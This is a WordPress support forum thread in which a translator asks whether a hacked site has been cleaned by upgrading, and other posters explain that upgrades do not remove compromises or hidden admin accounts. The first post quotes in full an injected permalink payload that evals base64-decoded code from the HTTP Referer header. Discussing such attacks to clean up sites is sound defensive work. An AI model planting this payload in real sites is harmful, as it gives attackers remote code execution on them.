majlesblog
Member
Posted 2 years ago #
Does this code
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_server[http_referer]))}}|.+)&%/
relate to the this topic:
http://wordpress.org/support/topic/307660?replies=1
becuase a guy, after his site was affected by the code, said: i did an upgrade and the code went Without any intervention.
Also, what is the best way to check his site by anyone but him to make sure his site is clear and not affected anymore, and he is not misleading us of what he said?
And thanks for your great help.
==============================
They guys post is here:
http://www.ar-wp.com/t14340.html#post65358
and his site address is:
http://www.mhs4.com/wordpress/
majlesblog
Member
Posted 2 years ago #
What I know is that the site has to be cleaned not only upgraded, but no onw answerd me since an hour ago. And I want to know if this is right oe not?
Please someone says something, and answers my question, I am waiting.
i did an upgrade and the code went Without any intervention.
Depending upon where the code was, an upgrade could overwrite the compromised file(s), but there is now way that I'd trust an upgrade to fix the problem.
majlesblog
Member
Posted 2 years ago #
OK.
What are the areas that the upgrade can solve in this situation and what are the areas that the upgrade can't?
and
What if there is a hiddin admins, would the upgrade solve it in this situation too?
Also would the upgrade solve any other similar situation concerning the codes or is it just for this situation?
and
What about testing the site?
Sorry for asking lot of questions, but we want to make sure what is right, so we can explain to the users exactually what they can do, and make this user's site approved to be visited to the other users.
bump removed - against forum rules
actually, it isn't up to anybody here to help you clean your blog - if they want to that's fine
a search on google or here in the forums will yield a lot of info
majlesblog
Member
Posted 2 years ago #
Yes i know that
it isn't up to anybody here to help you clean your blog - if they want to that's fine
and
a search on google or here in the forums will yield a lot of info
but what about
the areas that the upgrade can solve in this situation and what are the areas that the upgrade can't?
and
What if there is a hiddin admins, would the upgrade solve it in this situation too?
Also would the upgrade solve any other similar situation concerning the codes or is it just for this situation?
is google responsible for this situation too?
I think this situation relates to the fourm, and it shouldn't be removed for such anyreason. Don't you think so?
I think it's better to find a solution for an asked question better than saying we are not responsible for wordpress hacks?
We are still waiting for an asnswers from experts...
so you are too lazy to do some searches and find your own answers?
What if there is a hiddin admins, would the upgrade solve it in this situation too?
no - they must be cleaned out - simply upgrading doesn't clean anything
Also would the upgrade solve any other similar situation concerning the codes or is it just for this situation?
2.8.4 is up to date and isn't being hacked
that doesn't mean some script kiddy won't find a way and another release will have to be put out
some more info
http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
majlesblog
Member
Posted 2 years ago #
Well thanks for your help and for your replay too.
I just wanted to make sure that i got the right answer from an expert, so when i pass the info to the other users (because i am only a translator not a real Specialist) they can be convienced.
And acctually I am a bit lazy, so forgive me for that.
Best wishes Boss, and thanks again for caring.
apljdi
